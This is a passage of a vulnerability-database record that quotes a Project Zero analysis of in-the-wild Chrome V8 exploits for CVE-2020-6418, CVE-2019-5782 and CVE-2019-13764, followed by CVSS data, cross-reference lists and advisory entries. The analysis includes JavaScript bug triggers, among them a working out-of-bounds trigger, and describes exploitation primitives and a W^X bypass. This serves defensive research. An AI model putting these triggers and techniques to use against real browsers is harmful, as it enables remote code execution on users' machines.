(stack.indexOf(\"Number (\") == -1) {\n\njit_detector.is_compiled = true;\n\n}\n\n};\n\nfunction trigger(array, proxy) {\n\nif (!jit_detector.is_compiled) {\n\nNumber(jit_detector);\n\n}\n\n[...] \n \n--- \n \nDuring compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.\n\nThe exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.\n\n#### Exploit 2\n\nAfter CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:\n\nfunction trigger(new_target) {\n\nfunction inner(new_target) {\n\npopped = array.pop(\n\nReflect.construct(function() { }, arguments, new_target));\n\n}\n\ninner(new_target);\n\n} \n \n--- \n \nBy making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.\n\nThe new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn\u2019t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.\n\nThe exploit can\u2019t modify the class body indices directly as they\u2019re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.\n\nThis version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.\n\n#### Exploit 3 & 4\n\nThe actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That\u2019s the only significant change made by the author.\n\nExploit 3 is the only one we\u2019ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.\n\nThe exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.\n\n[The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn\u2019t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.\n\n### 3\\. CVE-2019-5782\n\n### The vulnerability\n\nCVE-2019-5782 is an issue in TurboFan\u2019s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.\n\nNote that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).\n\nIn this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:\n\noob_index = 100000;\n\nfunction trigger() {\n\nlet array = [1.1, 1.1];\n\nlet index = arguments.length;\n\nindex = index - 65534;\n\nindex = Math.max(index, 0);\n\nreturn array[index] = 2.2;\n\n}\n\nfor (let i = 0; i < 20000; i++) {\n\ntrigger(1,2,3);\n\n}\n\nprint(trigger.apply(null, new Array(65534 + oob_index))); \n \n--- \n \nQixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property.\n\n#### The exploit\n\nThe discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn\u2019t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It\u2019s worth noting that this approach doesn\u2019t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.\n\nInterestingly, this is the only exploit that doesn\u2019t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.\n\nAs the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.\n\nThe public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.\n\n### 4\\. CVE-2019-13764\n\nThis more complex typer issue occurs when TurboFan doesn\u2019t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:\n\nfor (var i = -Infinity; i < 0; i += Infinity) { [...] } \n \n--- \n \nThis vulnerability and exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There\u2019s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.\n\nThe comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn\u2019t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.\n\nIt\u2019s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have \u201crevived\u201d the exploit for CVE-2019-5782.\n\n### Conclusion\n\nThe timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.\n\nIt is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.\n\nThe area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don\u2019t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.\n\nThis is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).\n", "published": "2021-01-12T00:00:00", "modified": "2021-01-12T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2017-5070", "CVE-2019-13764", "CVE-2019-5782", "CVE-2020-6418"], "immutableFields": [], "lastseen": "2022-08-25T01:57:26", "viewCount": 455, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201706-8", "ASA-201707-4", "ASA-201902-3", "ASA-202002-11"]}, {"type": "attackerkb", "idList": ["AKB:1206A37C-0344-4C92-BE29-0F3E27522523", "AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0780", "CPAI-2019-2470", "CPAI-2020-0097"]}, {"type": "chrome", "idList": ["GCSA-2415374810976728715", "GCSA-3475418297324307253", "GCSA-3820662912991436133", "GCSA-6268810185140219955"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-5070", "CISA-KEV-CVE-2020-6418"]}, {"type": "cve", "idList": ["CVE-2017-5070", "CVE-2019-13764", "CVE-2019-5782", "CVE-2020-6418"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4395-1:611B8", "DEBIAN:DSA-4395-1:E48C1", "DEBIAN:DSA-4606-1:01C21", "DEBIAN:DSA-4606-1:D7F34", "DEBIAN:DSA-4638-1:8959D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5070", "DEBIANCVE:CVE-2019-13764", "DEBIANCVE:CVE-2019-5782", "DEBIANCVE:CVE-2020-6418"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "fedora", "idList": ["FEDORA:3240460C5991", "FEDORA:58B4460D22EC", "FEDORA:58B936057122", "FEDORA:6395E630FBA4", "FEDORA:6C6FD60799FF", "FEDORA:81D4A60CDC47", "FEDORA:906EB6076D01", "FEDORA:934A8603EB6C", "FEDORA:9471A606D8C2", "FEDORA:9B26C601E80E", "FEDORA:C3C866194B96", "FEDORA:E68A1603A526"]}, {"type": "freebsd", "idList": ["52F4B48B-4AC3-11E7-99AA-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201706-20", "GLSA-202003-08"]}, {"type": "githubexploit", "idList": ["882A81DB-33F9-5A22-8935-CC00EA6D1412", "D253294E-AE35-5B65-8B7D-17D007162D00", "D5119FBA-40A2-5447-A4DA-EFDF665F9D0D"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:0519E4321416167A439C0603E926B98E", "GOOGLEPROJECTZERO:3397E6EF67D4C71C395ED0244548698A", "GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA11035", "KLA11413", "KLA11621", "KLA11678", "KLA11718", "KLA11722"]}, {"type": "mageia", "idList": ["MGASA-2017-0317", "MGASA-2020-0078", "MGASA-2020-0123"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-CHROME_JSCREATE_SIDEEFFECT-"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["700131.PASL", "700482.PASL", "701270.PASL", "DEBIAN_DSA-4395.NASL", "DEBIAN_DSA-4606.NASL", "DEBIAN_DSA-4638.NASL", "FEDORA_2017-1E34DA27F3.NASL", "FEDORA_2017-98BED96D12.NASL", "FEDORA_2017-A66E2C5B62.NASL", "FEDORA_2017-A7A488D8D0.NASL", "FEDORA_2017-B8D76BEF4E.NASL", "FEDORA_2017-C11D7EF69A.NASL", "FEDORA_2019-05A780936D.NASL", "FEDORA_2019-1A10C04281.NASL", "FEDORA_2019-561EAE4626.NASL", "FEDORA_2020-39E0B8BD14.NASL", "FEDORA_2020-4355EA258E.NASL", "FEDORA_2020-F6271D7AFA.NASL", "FREEBSD_PKG_52F4B48B4AC311E799AAE8E0B747A45A.NASL", "GENTOO_GLSA-201706-20.NASL", "GENTOO_GLSA-202003-08.NASL", "GOOGLE_CHROME_59_0_3071_86.NASL", "GOOGLE_CHROME_72_0_3626_81.NASL", "GOOGLE_CHROME_79_0_3945_79.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "MACOSX_GOOGLE_CHROME_59_0_3071_86.NASL", "MACOSX_GOOGLE_CHROME_72_0_3626_81.NASL", "MACOSX_GOOGLE_CHROME_79_0_3945_79.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "OPENSUSE-2017-661.NASL", "OPENSUSE-2019-204.NASL", "OPENSUSE-2019-205.NASL", "OPENSUSE-2019-2692.NASL", "OPENSUSE-2020-259.NASL", "REDHAT-RHSA-2017-1399.NASL", "REDHAT-RHSA-2019-0309.NASL", "REDHAT-RHSA-2019-4238.NASL", "REDHAT-RHSA-2020-0738.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704395", "OPENVAS:1361412562310704606", "OPENVAS:1361412562310704638", "OPENVAS:1361412562310811080", "OPENVAS:1361412562310811081", "OPENVAS:1361412562310811082", "OPENVAS:1361412562310811307", "OPENVAS:1361412562310814831", "OPENVAS:1361412562310814832", "OPENVAS:1361412562310814833", "OPENVAS:1361412562310815871", "OPENVAS:1361412562310815872", "OPENVAS:1361412562310815873", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310851564", "OPENVAS:1361412562310852296", "OPENVAS:1361412562310852300", "OPENVAS:1361412562310852858", "OPENVAS:1361412562310853048", "OPENVAS:1361412562310872852", "OPENVAS:1361412562310872882", "OPENVAS:1361412562310872901", "OPENVAS:1361412562310873085", "OPENVAS:1361412562310875626", "OPENVAS:1361412562310877318", "OPENVAS:1361412562310877374", "OPENVAS:1361412562310877601", "OPENVAS:1361412562310877632"]}, {"type": "osv", "idList": ["OSV:DSA-4395-1", "OSV:DSA-4395-2", "OSV:DSA-4606-1", "OSV:DSA-4638-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A"]}, {"type": "redhat", "idList": ["RHSA-2017:1399", "RHSA-2019:0309", "RHSA-2019:4238", "RHSA-2020:0738"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5070", "RH:CVE-2019-13764", "RH:CVE-2019-5782", "RH:CVE-2020-6418"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1501-1", "OPENSUSE-SU-2017:1502-1", "OPENSUSE-SU-2019:0204-1", "OPENSUSE-SU-2019:0205-1", "OPENSUSE-SU-2019:0206-1", "OPENSUSE-SU-2019:0216-1", "OPENSUSE-SU-2019:2692-1", "OPENSUSE-SU-2019:2694-1", "OPENSUSE-SU-2020:0245-1", "OPENSUSE-SU-2020:0259-1"]}, {"type": "thn", "idList": ["THN:0779D6845791AA6EB3C4ABB49D44DCC1", "THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:0CFA20DA4CAE2D0F32CD16D0779CC426", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:88098D30DA04E912B06C03B52556385C", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5070", "UB:CVE-2019-13764", "UB:CVE-2019-5782", "UB:CVE-2020-6418"]}, {"type": "veracode", "idList": ["VERACODE:28130"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201706-8", "ASA-201707-4", "ASA-201902-3", "ASA-202002-11"]}, {"type": "attackerkb", "idList": ["AKB:F1FF517B-6FF7-4972-9CA6-6F009CD86E66"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0780", "CPAI-2019-2470", "CPAI-2020-0097"]}, {"type": "chrome", "idList": ["GCSA-2415374810976728715", "GCSA-3475418297324307253", "GCSA-3820662912991436133", "GCSA-6268810185140219955"]}, {"type": "cve", "idList": ["CVE-2017-5070", "CVE-2019-5782", "CVE-2020-6418"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4395-1:E48C1", "DEBIAN:DSA-4638-1:8959D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5070", "DEBIANCVE:CVE-2019-13764", "DEBIANCVE:CVE-2019-5782", "DEBIANCVE:CVE-2020-6418"]}, {"type": "exploitdb", "idList": ["EDB-ID:48186"]}, {"type": "fedora", "idList": ["FEDORA:3240460C5991", "FEDORA:58B936057122", "FEDORA:6C6FD60799FF", "FEDORA:81D4A60CDC47", "FEDORA:906EB6076D01", "FEDORA:934A8603EB6C", "FEDORA:9B26C601E80E"]}, {"type": "freebsd", "idList": ["52F4B48B-4AC3-11E7-99AA-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201706-20", "GLSA-202003-08"]}, {"type": "githubexploit", "idList": ["882A81DB-33F9-5A22-8935-CC00EA6D1412", "D253294E-AE35-5B65-8B7D-17D007162D00", "D5119FBA-40A2-5447-A4DA-EFDF665F9D0D"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:0519E4321416167A439C0603E926B98E"]}, {"type": "kaspersky", "idList": ["KLA11035", "KLA11413"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_JSCREATE_SIDEEFFECT"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4395.NASL", "DEBIAN_DSA-4638.NASL", "FEDORA_2017-1E34DA27F3.NASL", "FEDORA_2017-A66E2C5B62.NASL", "FEDORA_2017-B8D76BEF4E.NASL", "FEDORA_2017-C11D7EF69A.NASL", "FREEBSD_PKG_52F4B48B4AC311E799AAE8E0B747A45A.NASL", "GENTOO_GLSA-201706-20.NASL", "GENTOO_GLSA-202003-08.NASL", "GOOGLE_CHROME_59_0_3071_86.NASL", "GOOGLE_CHROME_72_0_3626_81.NASL", "GOOGLE_CHROME_80_0_3987_122.NASL", "MACOSX_GOOGLE_CHROME_59_0_3071_86.NASL", "MACOSX_GOOGLE_CHROME_72_0_3626_81.NASL", "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "OPENSUSE-2017-661.NASL", "OPENSUSE-2019-204.NASL", "OPENSUSE-2019-205.NASL", "OPENSUSE-2020-259.NASL", "REDHAT-RHSA-2017-1399.NASL", "REDHAT-RHSA-2019-0309.NASL", "REDHAT-RHSA-2020-0738.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704395", "OPENVAS:1361412562310704638", "OPENVAS:1361412562310811080", "OPENVAS:1361412562310811081", "OPENVAS:1361412562310811082", "OPENVAS:1361412562310814831", "OPENVAS:1361412562310814832", "OPENVAS:1361412562310814833", "OPENVAS:1361412562310816584", "OPENVAS:1361412562310816585", "OPENVAS:1361412562310816586", "OPENVAS:1361412562310851564", "OPENVAS:1361412562310853048"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156632"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A"]}, {"type": "redhat", "idList": ["RHSA-2019:0309"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-13764", "RH:CVE-2019-5782", "RH:CVE-2020-6418"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1501-1", "OPENSUSE-SU-2017:1502-1", "OPENSUSE-SU-2019:0204-1", "OPENSUSE-SU-2019:0205-1", "OPENSUSE-SU-2019:0206-1", "OPENSUSE-SU-2019:0216-1", "OPENSUSE-SU-2020:0245-1", "OPENSUSE-SU-2020:0259-1"]}, {"type": "thn", "idList": ["THN:DC209DD441842FCD2682680F22D67854"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF", "THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:5121F056A99F51D23A4BB71AF117FA3C"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-6418"]}, {"type": "zdt", "idList": ["1337DAY-ID-34056"]}]}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1661392696, "score": 1661392800}, "_internal": {"score_hash": "134ee91243dfa6aeb547535a97fbd6c9"}}

{"checkpoint_advisories": [{"lastseen": "2021-12-17T11:11:18", "description": "A heap corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2019-13764)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2021-08-11T00:00:00", "id": "CPAI-2019-2470", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-21T18:44:25", "description": "A type confusion vulnerability exists in Google Chrome. The vulnerability is due to improper handling of objects in memory by the V8 JavaScript engine while compiling code. A remote attacker could exploit this vulnerability by enticing a user to open a malicious web page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-24T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome V8 Crankshaft Type Confusion (CVE-2017-5070)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2022-11-21T00:00:00", "id": "CPAI-2017-0780", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T23:35:46", "description": "A type confusion vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Type Confusion (CVE-2020-6418)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2021-01-25T00:00:00", "id": "CPAI-2020-0097", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:33:44", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed\na remote attacker to potentially exploit heap corruption via a crafted HTML\npage.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "ubuntucve", "title": "CVE-2019-13764", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2019-12-10T00:00:00", "id": "UB:CVE-2019-13764", "href": "https://ubuntu.com/security/CVE-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:39", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux,\nWindows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker\nto execute arbitrary code inside a sandbox via a crafted HTML page.\n\n#### Bugs\n\n * <https://crbug.com/722756>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": 